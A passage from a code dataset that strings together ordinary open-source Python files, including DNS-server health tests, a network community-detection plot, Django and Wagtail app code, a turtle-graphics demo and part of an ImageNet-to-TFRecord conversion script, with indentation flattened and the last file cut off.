ns = mocks.MockNameServer(mocks.BROKEN_IP)
(is_broken, warning, duration) = ns.TestNegativeResponse()
self.assertEquals(is_broken, True)
self.assertEquals(warning, 'BadResponse')
def testWildcardCache(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(response, is_broken, warning, duration) = ns.QueryWildcardCache()
self.assertEquals(is_broken, False)
question = str(response.question[0])
self.assertTrue(question.startswith('namebench'))
self.assertEquals(warning, None)
def testCheckHealthGood(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
ns.CheckHealth()
self.assertEquals(ns.CheckHealth(), False)
self.assertEquals(ns.warnings, ['No answer'])
self.assertEquals(len(ns.checks), 1)
self.assertEquals(ns.failure[0], 'TestWwwGoogleComResponse')
self.assertEquals(ns.checks[0][0:3],
('TestWwwGoogleComResponse', True, 'No answer'))
def testCheckHealthPerfect(self):
ns = mocks.MockNameServer(mocks.PERFECT_IP)
ns.CheckHealth()
self.assertEquals(ns.CheckHealth(), True)
expected = ['www.google.com. is hijacked (66.211.169.65 + 66.211.169.2)',
'google.com. is hijacked (66.211.169.65 + 66.211.169.2)',
'NXDOMAIN Hijacking (66.211.169.65 + 66.211.169.2)']
self.assertEquals(ns.warnings, expected)
self.assertEquals(len(ns.checks), 5)
self.assertEquals(ns.failure, None)
self.assertTrue(ns.check_duration > 10)
def testQUeryWildcardCacheSaving(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
other_ns = mocks.MockNameServer(mocks.PERFECT_IP)
ns.QueryWildcardCache(save=True)
other_ns.QueryWildcardCache(save=True)
# Test our cache-sharing mechanisms
(hostname, ttl) = ns.cache_check
self.assertTrue(hostname.startswith('namebench'))
self.assertEquals(ttl, 159)
(other_hostname, other_ttl) = other_ns.cache_check
self.assertTrue(other_hostname.startswith('namebench'))
self.assertNotEqual(hostname, other_hostname)
self.assertEquals(other_ttl, 159)
def testSharedCacheNoMatch(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
other_ns = mocks.MockNameServer(mocks.PERFECT_IP)
ns.QueryWildcardCache(save=True)
other_ns.QueryWildcardCache(save=True)
(shared, slower, faster) = ns.TestSharedCache(other_ns)
self.assertEquals(shared, False)
self.assertEquals(slower, None)
self.assertEquals(faster, None)
def testSharedCacheMatch(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
other_ns = mocks.MockNameServer(mocks.PERFECT_IP)
ns.QueryWildcardCache(save=True)
other_ns.QueryWildcardCache(save=True)
# Increase the TTL of 'other'
other_ns.cache_check = (other_ns.cache_check[0], other_ns.cache_check[1] + 5)
(shared, slower, faster) = ns.TestSharedCache(other_ns)
self.assertEquals(shared, True)
self.assertEquals(slower.ip, mocks.GOOD_IP)
self.assertEquals(faster.ip, mocks.PERFECT_IP)
# Increase the TTL of 'other' by a whole lot
other_ns.cache_check = (other_ns.cache_check[0], other_ns.cache_check[1] + 3600)
(shared, slower, faster) = ns.TestSharedCache(other_ns)
self.assertEquals(shared, False)
self.assertEquals(slower, None)
self.assertEquals(faster, None)
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
mapequation/infomap
|
examples/python/infomap-networkx.py
|
1
|
2219
|
#!/usr/bin/env python
import networkx as nx
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import pathlib
import infomap
"""
Generate and draw a network with NetworkX, colored
according to the community structure found by Infomap.
"""
def find_communities(G):
"""
Partition network with the Infomap algorithm.
Annotates nodes with 'community' id.
"""
im = infomap.Infomap("--two-level")
print("Building Infomap network from a NetworkX graph...")
im.add_networkx_graph(G)
print("Find communities with Infomap...")
im.run()
print(f"Found {im.num_top_modules} modules with codelength: {im.codelength}")
communities = im.get_modules()
nx.set_node_attributes(G, communities, 'community')
def draw_network(G):
# position map
pos = nx.spring_layout(G)
# community index
communities = [c - 1 for c in nx.get_node_attributes(G, 'community').values()]
num_communities = max(communities) + 1
# color map from http://colorbrewer2.org/
cmap_light = colors.ListedColormap(
['#a6cee3', '#b2df8a', '#fb9a99', '#fdbf6f', '#cab2d6'], 'indexed', num_communities)
cmap_dark = colors.ListedColormap(
['#1f78b4', '#33a02c', '#e31a1c', '#ff7f00', '#6a3d9a'], 'indexed', num_communities)
# edges
nx.draw_networkx_edges(G, pos)
# nodes
node_collection = nx.draw_networkx_nodes(
G, pos=pos, node_color=communities, cmap=cmap_light)
# set node border color to the darker shade
dark_colors = [cmap_dark(v) for v in communities]
node_collection.set_edgecolor(dark_colors)
# Print node labels separately instead
for n in G.nodes:
plt.annotate(n,
xy=pos[n],
textcoords='offset points',
horizontalalignment='center',
verticalalignment='center',
xytext=[0, 2],
color=cmap_dark(communities[n]))
plt.axis('off')
pathlib.Path("output").mkdir(exist_ok=True)
print("Writing network figure to output/karate.png")
plt.savefig("output/karate.png")
# plt.show()
G = nx.karate_club_graph()
find_communities(G)
draw_network(G)
|
agpl-3.0
|
chouseknecht/openshift-restclient-python
|
openshift/test/test_v1_cluster_resource_quota.py
|
1
|
4299
|
# coding: utf-8
"""
OpenShift API (with Kubernetes)
OpenShift provides builds, application lifecycle, image content management, and administrative policy on top of Kubernetes. The API allows consistent management of those objects. All API operations are authenticated via an Authorization bearer token that is provided for service accounts as a generated secret (in JWT form) or via the native OAuth endpoint located at /oauth/authorize. Core infrastructure components may use openshift.client certificates that require no authentication. All API operations return a 'resourceVersion' string that represents the version of the object in the underlying storage. The standard LIST operation performs a snapshot read of the underlying objects, returning a resourceVersion representing a consistent version of the listed objects. The WATCH operation allows all updates to a set of objects after the provided resourceVersion to be observed by a openshift.client. By listing and beginning a watch from the returned resourceVersion, openshift.clients may observe a consistent view of the state of one or more objects. Note that WATCH always returns the update after the provided resourceVersion. Watch may be extended a limited time in the past - using etcd 2 the watch window is 1000 events (which on a large cluster may only be a few tens of seconds) so openshift.clients must explicitly handle the \"watch to old error\" by re-listing. Objects are divided into two rough categories - those that have a lifecycle and must reflect the state of the cluster, and those that have no state. Objects with lifecycle typically have three main sections: * 'metadata' common to all objects * a 'spec' that represents the desired state * a 'status' that represents how much of the desired state is reflected on the cluster at the current time Objects that have no state have 'metadata' but may lack a 'spec' or 'status' section. Objects are divided into those that are namespace scoped (only exist inside of a namespace) and those that are cluster scoped (exist outside of a namespace). A namespace scoped resource will be deleted when the namespace is deleted and cannot be created if the namespace has not yet been created or is in the process of deletion. Cluster scoped resources are typically only accessible to admins - resources like nodes, persistent volumes, and cluster policy. All objects have a schema that is a combination of the 'kind' and 'apiVersion' fields. This schema is additive only for any given version - no backwards incompatible changes are allowed without incrementing the apiVersion. The server will return and accept a number of standard responses that share a common schema - for instance, the common error type is 'metav1.Status' (described below) and will be returned on any error from the API server. The API is available in multiple serialization formats - the default is JSON (Accept: application/json and Content-Type: application/json) but openshift.clients may also use YAML (application/yaml) or the native Protobuf schema (application/vnd.kubernetes.protobuf). Note that the format of the WATCH API call is slightly different - for JSON it returns newline delimited objects while for Protobuf it returns length-delimited frames (4 bytes in network-order) that contain a 'versioned.Watch' Protobuf object. See the OpenShift documentation at https://docs.openshift.org for more information.
OpenAPI spec version: latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import openshift.client
from kubernetes.client.rest import ApiException
from openshift.client.models.v1_cluster_resource_quota import V1ClusterResourceQuota
class TestV1ClusterResourceQuota(unittest.TestCase):
""" V1ClusterResourceQuota unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1ClusterResourceQuota(self):
"""
Test V1ClusterResourceQuota
"""
# FIXME: construct object with mandatory attributes with example values
#model = openshift.client.models.v1_cluster_resource_quota.V1ClusterResourceQuota()
pass
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
TNT-Samuel/Coding-Projects
|
DNS Server/Source - Copy/Lib/turtledemo/lindenmayer.py
|
164
|
2434
|
#!/usr/bin/env python3
""" turtle-example-suite:
xtx_lindenmayer_indian.py
Each morning women in Tamil Nadu, in southern
India, place designs, created by using rice
flour and known as kolam on the thresholds of
their homes.
These can be described by Lindenmayer systems,
which can easily be implemented with turtle
graphics and Python.
Two examples are shown here:
(1) the snake kolam
(2) anklets of Krishna
Taken from Marcia Ascher: Mathematics
Elsewhere, An Exploration of Ideas Across
Cultures
"""
################################
# Mini Lindenmayer tool
###############################
from turtle import *
def replace( seq, replacementRules, n ):
for i in range(n):
newseq = ""
for element in seq:
newseq = newseq + replacementRules.get(element,element)
seq = newseq
return seq
def draw( commands, rules ):
for b in commands:
try:
rules[b]()
except TypeError:
try:
draw(rules[b], rules)
except:
pass
def main():
################################
# Example 1: Snake kolam
################################
def r():
right(45)
def l():
left(45)
def f():
forward(7.5)
snake_rules = {"-":r, "+":l, "f":f, "b":"f+f+f--f--f+f+f"}
snake_replacementRules = {"b": "b+f+b--f--b+f+b"}
snake_start = "b--f--b--f"
drawing = replace(snake_start, snake_replacementRules, 3)
reset()
speed(3)
tracer(1,0)
ht()
up()
backward(195)
down()
draw(drawing, snake_rules)
from time import sleep
sleep(3)
################################
# Example 2: Anklets of Krishna
################################
def A():
color("red")
circle(10,90)
def B():
from math import sqrt
color("black")
l = 5/sqrt(2)
forward(l)
circle(l, 270)
forward(l)
def F():
color("green")
forward(10)
krishna_rules = {"a":A, "b":B, "f":F}
krishna_replacementRules = {"a" : "afbfa", "b" : "afbfbfbfa" }
krishna_start = "fbfbfbfb"
reset()
speed(0)
tracer(3,0)
ht()
left(45)
drawing = replace(krishna_start, krishna_replacementRules, 3)
draw(drawing, krishna_rules)
tracer(1)
return "Done!"
if __name__=='__main__':
msg = main()
print(msg)
mainloop()
|
gpl-3.0
|
kunovg/pldownload
|
workers/linkgenerator.py
|
1
|
2225
|
import logging
from queue import Queue
from threading import Thread
from linkgenerators.soundcloud import ScDownloader
from linkgenerators.vubey import Vubey
from linkgenerators.youtubemp3org import Mp3Org
from linkgenerators.youtubetomp3cc import Mp3Cc
from linkgenerators.onlinevideoconverter import Ovc
from linkgenerators.twoconv import TwoConv
from linkgenerators.convert2mp3 import ConvertToMp3
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class LinkGenerator(Thread):
def __init__(self, idsqueue, linksqueue, maxtime, sc_client_id):
Thread.__init__(self)
self.idsqueue = idsqueue
self.linksqueue = linksqueue
self.maxtime = maxtime
self.sc_client_id = sc_client_id
def run(self):
while True:
obj = self.idsqueue.get()
tempqueue = Queue()
if obj.get('youtube_id'):
threads = [
# Deprecated
# Mp3Cc(tempqueue, obj['youtube_id'], self.maxtime),
# Mp3Org(tempqueue, obj['youtube_id'], self.maxtime),
# Vubey(tempqueue, obj['youtube_id'], self.maxtime),
Ovc(tempqueue, obj['youtube_id'], self.maxtime),
TwoConv(tempqueue, obj['youtube_id'], self.maxtime),
ConvertToMp3(tempqueue, obj['youtube_id'], self.maxtime),
]
elif obj.get('sc_permalink'):
threads = [ScDownloader(tempqueue, obj['sc_permalink'], self.sc_client_id, self.maxtime)]
for th in threads:
th.daemon = True
th.start()
try:
res = tempqueue.get(True, self.maxtime)
# self.linksqueue.put({**obj, **{'link': link, 'not_dummy': True}})
self.linksqueue.put({**obj, **res})
except:
# obj['playlist_queue'].put(False)
# self.linksqueue.put(obj)
self.linksqueue.put({**obj, **{'link': None}})
logging.warning('Ningun metodo pudo obtener el link en menos de {} segundos'.format(self.maxtime))
self.idsqueue.task_done()
|
mit
|
osvalr/odoo
|
addons/account_followup/wizard/__init__.py
|
437
|
1076
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_followup_print
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
willcodefortea/wagtail
|
wagtail/project_template/core/migrations/0002_create_homepage.py
|
3
|
7165
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models, connection
from django.db.transaction import set_autocommit
class Migration(DataMigration):
depends_on = (
('wagtailcore', '0002_initial_data'),
)
def forwards(self, orm):
if connection.vendor == 'sqlite':
set_autocommit(True)
orm['wagtailcore.Page'].objects.get(id=2).delete()
homepage_content_type, created = orm['contenttypes.contenttype'].objects.get_or_create(
model='homepage', app_label='core', defaults={'name': 'Homepage'})
homepage = orm['core.HomePage'].objects.create(
title="Homepage",
slug='home',
content_type=homepage_content_type,
path='00010001',
depth=2,
numchild=0,
url_path='/home/',
)
orm['wagtailcore.site'].objects.create(
hostname='localhost', root_page=homepage, is_default_site=True)
def backwards(self, orm):
pass
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.homepage': {
'Meta': {'object_name': 'HomePage', '_ormbases': ['wagtailcore.Page']},
'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['wagtailcore.Page']", 'unique': 'True', 'primary_key': 'True'})
},
'wagtailcore.page': {
'Meta': {'object_name': 'Page'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pages'", 'to': "orm['contenttypes.ContentType']"}),
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'expire_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'expired': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'go_live_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'has_unpublished_changes': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'live': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'owned_pages'", 'null': 'True', 'to': "orm['auth.User']"}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'search_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'seo_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'show_in_menus': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url_path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
'wagtailcore.site': {
'Meta': {'unique_together': "(('hostname', 'port'),)", 'object_name': 'Site'},
'hostname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_default_site': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'port': ('django.db.models.fields.IntegerField', [], {'default': '80'}),
'root_page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sites_rooted_here'", 'to': "orm['wagtailcore.Page']"})
}
}
complete_apps = ['core']
symmetrical = True
|
bsd-3-clause
|
enovance/numeter
|
web-app/numeter_webapp/rest/viewsets/view.py
|
2
|
2170
|
"""
View ViewSet module.
"""
from rest_framework.viewsets import ModelViewSet
from rest_framework.renderers import JSONRenderer
from rest_framework.response import Response
from rest_framework.status import HTTP_201_CREATED, HTTP_400_BAD_REQUEST
from rest_framework.decorators import link
from multiviews.models import View
from rest.serializers import ViewSerializer
from rest.permissions import IsOwnerOrForbidden
from rest.views import ModelListDelete
class ViewViewSet(ModelListDelete, ModelViewSet):
"""
View endpoint, availaible for all users. It filters View by its user and
groups.
"""
model = View
permission_classes = (IsOwnerOrForbidden,)
serializer_class = ViewSerializer
allowed_methods = ('POST', 'PATCH', 'DELETE', 'GET')
def get_queryset(self):
q = self.request.QUERY_PARAMS.get('q', '')
objects = self.model.objects.user_web_filter(q, self.request.user)
# ID filter
ids = self.request.QUERY_PARAMS.get('id', [])
try:
objects = objects.filter(id__in=ids) if ids else objects
except ValueError:
from json import loads
ids = loads(ids)
objects = objects.filter(id__in=ids) if ids else objects
return objects
@link()
def extended_data(self, request, pk=None):
view = self.get_object()
return Response(view.get_extended_data(res=request.GET.get('res', 'Daily')))
# def create(self, request):
# """
# Base method replaced for automaticaly make users and groups.
# """
# serializer = ViewSerializer(data=request.DATA)
# if serializer.is_valid():
# view = serializer.save()
# if not view.groups.all().exists():
# view.groups.add(*request.user.groups.all())
# if request.DATA.get('is_private', False):
# view.users.add(request.user)
# return Response(JSONRenderer().render(serializer.data),
# status=HTTP_201_CREATED)
# else:
# return Response(serializer.errors,
# status=HTTP_400_BAD_REQUEST)
|
agpl-3.0
|
jmhsi/justin_tinker
|
data_science/courses/learning_dl_packages/models/research/slim/datasets/build_imagenet_data.py
|
8
|
26196
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import google3
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'r').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
